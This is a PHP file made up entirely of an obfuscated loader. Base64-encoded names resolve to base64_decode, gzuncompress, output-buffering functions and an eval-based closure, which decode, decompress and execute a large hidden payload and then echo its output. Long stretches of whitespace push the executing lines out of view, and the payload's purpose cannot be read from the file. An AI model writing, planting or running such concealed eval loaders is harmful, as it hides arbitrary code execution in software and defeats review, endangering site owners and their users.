<?php 
        $FBVeznOzgp='printf';$lmSNpEQCPu='Loading rf_ob_true';
        











































































































































                                                                                                                                                                                                $XFdzspFcuK='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $CXTdUPqPFF='cmV0dXJuIGV2YWwoJGxtU05wRVFDUHUpOw==';
$tVRKhvdVQv='TXR6ZGlXSlNEQw==';

                                                                                                                                                                                                                                          $GNNxZMMEaI=' Z3p1bmNvbXByZXNz';                    $dcPHFbvSoy='  b2Jfc3RhcnQ=';                                                                                                    $lytUCjvNIo='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $FBVeznOzgp=                                                              'base64_decode'                           ;                                                                       $GNNxZMMEaI=$FBVeznOzgp($GNNxZMMEaI);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               $tVRKhvdVQv=$FBVeznOzgp($tVRKhvdVQv);                                                                                                                                                                                                                                                                                                                                                                         $CXTdUPqPFF=$FBVeznOzgp($CXTdUPqPFF);
        $quFTWIiAFu=$tVRKhvdVQv('$lmSNpEQCPu',$CXTdUPqPFF);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $XFdzspFcuK=$FBVeznOzgp($XFdzspFcuK);                                                                                                                                                                                                                                                    $lytUCjvNIo=$FBVeznOzgp($lytUCjvNIo);                                                                                                                    $dcPHFbvSoy=$FBVeznOzgp($dcPHFbvSoy);                      $lmSNpEQCPu='eNrtW21vo0gS/j7S/Yf5MFJ2dKdZwHFm0SgfbGIw7ZjEYBroLysDMWAajMZvwb/+qnkztjOruZm9W92KiqKZ0N3V1VVPPVVN4vfvS/lA860prfaaur6/yb5G6XZ58+UDfXhYr7VtSrz7m6/L39fu79uvu5f3El1sNp8+fbr58q5a/v4f77qv7/9698H3nseyuzfW+fs/Ue6vntzMbf2OKNQ2qDaaHe7vb4rHp8B9l3xQNO2VTKejhXr/vpNOOunk7yk3XoI530Y7VcGCYx3WSNFX5ihUnJTM3V6cPTUkCiwKTH4qnJ3zOumkk0466aSTTjrp5P9NuhccnXTSSSd/X7lxF5uXu9vf/Rdv7b/cfOk80kknnXTSSSc/JWd/MyAF6/1jPjR0Kj7PqGiaFMtSkPGeYAZ4TNOF/GoQy8+8np6/zDcT39aoKut9IoSeMdY57+H8GVbEvTvWPFPAK99GmT+mKrFeD8RWP4PejESDtWrplCR0R6zZGnHoec7rcyyjoSl52cQYflYVPSNGkM4sbUVs7Qg/UzehlMD4Uz4UQU/iW/2Vr9C9Gw0Tl4o5oWLiWBp1EnG/4MWVK/QFYqPjwhJ3Hi8eXEVeESzuvUSnHtiAFFij4NwWaPwoDWJYy7G57P9uD8WwdglnDv0xPhbjgpz7Ujx5OazRwnKCiSRT1x5yL0bQzF9Ys0yVnESV9NDp6Zkr3AbqnAvUVAv9xIyKMRlRItCjP0b9p1WWEht8IMgxUcDOvP/H58j7B/DpaqHIR2J4mfrAiaqEiBrFE8neTKQZLfzbnK2ncY6t814+EJ+N4RyPZBNjbWmY/Yc5x8/mI2zqpr6c82ikYzVAkROYCU4XtsZ5aXz3lPjUl4LUsfQY7Dg+piixBRI6Ao5cQfxqC9reTQn1Ui0rx4e8l2hrB/AAft05grj1lFfqK2Y6MZgNg2geqZkUxIj5EezNCbMvuf3Mni3BFZKhH7xEjH2IB7Nblbf+E5trEYgdhr0D8L2+cmzEWbnfmuv7KvgFfN88mzB9hV9ihMbD3BV0HuJytHguAH+4bE8YSyFuKfjyn+21bd0MI4jnNvV8z8ahm+qA7fitdaFribybzlIWWjhjab/NMTsgzjLngC8KXbi0TTLAzwne+bK4cyyeIhavaJCaY5w7QhhCLqaPA6YLziFggVj90qZqXgt/O3i2A3tKnFMxI9Kh3gNymuEdMK2MSrvlan84E7G46ixBSCz+AGcDHGmhl+ou6uEj01/a7vtwRupacuZKvj8x4uA5H7KYryeSf1woo1ybO2mTM/ImZfwAtsSAxRDxvAtn2DoW3YBPAcPrwE3xxq3tZP5Vgv/ElsMCcocYP2hLb7gG7NI3bcGnmAOWd75SxIh7sYdNjLwx2pMxcJ3kXc8dT6/w4eVNPIAfNc4V+OosXvA8vw2sQxnnchzlEOvVSzU242QDy+JcN7XneawPTUqXMx4bZoyfZnxc749Qj4TuGNc2ns6uiJxjHSpcxqiFT8Yd38OjELcttXuIQg5Qrzdjv3tneMoYxpez7Ee4mfHZjgh4ecm7dm+4hz1YvrfxHKBxxWu8yLn52c8J+HnL4k0SEXIHdCYi8DrJwAcNvwMnhU6zn7pp54ubkH2x3tIPVa5kUgp5YlHg9XAIvh5WvPugRoMERcNWfVzfwTkg0f2QKDpw43TnJWRJEqg9Ftq7wnZZYCPBuSfQcryV4zVHWkbJxZfnKvaVNXOGdWzyIprHgAM8nOpYl3VZfDZjXTYLm67OCJxLC45t8yDoC4ALi+fMX8SSVwvprDbu4DnLkWYN5Eng2NPgpGfW4vM4bvJhrLm2wfi74TiIXYnjlg1t3Yy/Utto8uPVt2TII8rV+D9bJ8hbtwc5BhxUcinXriFFfsP5Cl11Tp24sw8cbVa56c9aNbXJYWITChy/PNUGv4XB21SVwJ52D1Hz8xk/XeU0datnb/cP/cTlN8DFfLhgeWrEwEm/Bcy2BdRhD3AyXZkCYpi/jNEPcepVnBsuBCz+qioMl8Ea9aCmz1Vei7yrXDnn38GdqvR5VzlUfqT+qW6xXkEvfAo94YHUMW3iP0vfmHusOeyEq+mJZ8HXwGnbb9U0GM+hZ9g5vapOjzTgTH1pchj6n/5ohhGxOQ2bFMmQS6TeH+IkONYr39h45Sd97ysy83VdJ4p/7fnmr+RR3it04GVV41jNSRbWK23xaNUDFD1vgsZtrDJMydV+rT53JBu6OSr72Hgasf6c+b/+G6zS3ronPvW9z2x+An2t9Gf0lU3PHJb2vdX7nnqrGgPfyPcHqLlwH8AcwVd6S2yd+rETZ/Uu51YcUPkQeKJY+xdj4FIni0nNhcGc4un8G3eY0ndxEavz+1n/2eY12eQ1NOduoUad3zVY3VvYgK88iIt5lMD3JjVk3TRlEUOuGTYnj3Wzb7IeGvwfuZDrwBUhwwjUxg3UvqKGSDaiUPdzdlbIvyNhvmQ1q/CL7DbxZBiDeJb1RUdz0/z89jxtz7gd7n1wxzhU85E8M1+XGKNp0ZdXtQJ47Kw/tvEG+rjXrOq1oRcALI/Br71pqUcqeMTAMTZgLeQI/4xHeDkz9ZEZ+f53667qhWNBbWB3hmvdKpb1mc3juY4BFqYvzynMm7cwD/ra9arQoeCtN9b7dfxZz37CdMHVv0IvQRlHLmy9byh44wHHFXdSq0+9RGb5EboJ9DEY8pbhIQ+K2vItnSwf3rj3F/nuQs8Da6iZQK8HnG0y3Fj9dCKxv9dcN3hSrcbu5YyDdoijMuwDPRQ6lHWp5J8/8m01F+54gxj4HWC2RTo8B46JPMk/3cdAz2UeXM538vJeUfc3tb+v7zTlXJZnSBahvoiPholdBL2bk0yreFHI6bP+pO4N0na/sEiB/6gIPtP2RDFrXtioo2wOdWuJzb5sclDLRngEuHgy4D4AqMsa/ilygUSA2RVw6rHok4UtdaMC/z/z/qHS42UVvhMH6szCDqlbYOCn9bd0ne3BEZvdw5k/8BLwGTrJK2X++7m6An0M9J117kBvHgNXgN/lyGXvLOocS9AS6uoRcA726v+dfY3qvOU9g/nv4Pam6yKOvWH2AvlZ1e3oKVczVRqxdzolTzJOntE6L65jouBbuA8UWFJXm6i8H8E9S6G3kKPFe6unGt8J46LyvRvw7H4h4B07L7FDqJnMzoDtz/pAtg+cEfKgp4F/xK/Euj3Tc+mzb+hoxdbMTu9KKHXHGm3fLS5sZvkNd30EvAJ9snRx7oeqB/hWHkjQ26YofGE17605q9b6XhmvMk5vrG2PN3le3qmg344XbM3D4DPYCPx5CGAeez90FVvAG+iLv07ys3iGcGbo6dCG+VBNQs4fD49P0W970kMwFuxO98tN8c7tsee8To3bw2N+4RN5Ey8wt69wd1SbM8qHBYbewpZ5FosWL0EPdem7uid+w2e00H+6Q7U4reKwVp9cc+8f5nfV4xV32ta95cLnuNg3m5TvMz5X+wPHDrNTL8Tumm/lXcXZb+ssdVW1QjKZ7wd3T5G+cQU/ZfWLrZ38HOcxXc2ZUR6XvTONo6JGj/Xct8zgqd0Tge/Kd+/rO08Rj+wCXJ4Veiep6OPP4jlpMFl81+9cA7CXZ/qWs/v7my/v3v0vfwfR+rha6/MZv7Sef/zu3/m3Pqp3ruz0/HuUfbBl/7jJZG83uW8t/eWm9cPNv37Iwuu9ltt9liiP0cPwzOQbwGboSmETo4rfgslgHQCHFLk0zQ8TVRq8FveZh3gjRYNgGhX3ZP6xmDct5mnlPK6cNzqUY2apwyjGhHLMKXRo5V07L+cFpQ6pmNcv5wUwr/p8zcfuk6U/+MnSN/D2yxlsT7+f+/jxy78BH5zT1w==';

        $dcPHFbvSoy();$quFTWIiAFu($GNNxZMMEaI($FBVeznOzgp($lmSNpEQCPu))); $aTgRguFfyy=$lytUCjvNIo();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $XFdzspFcuK();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































                                                                                                                                                                                                                     $aTgRguFfyy;function MtzdiWJSDC($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}
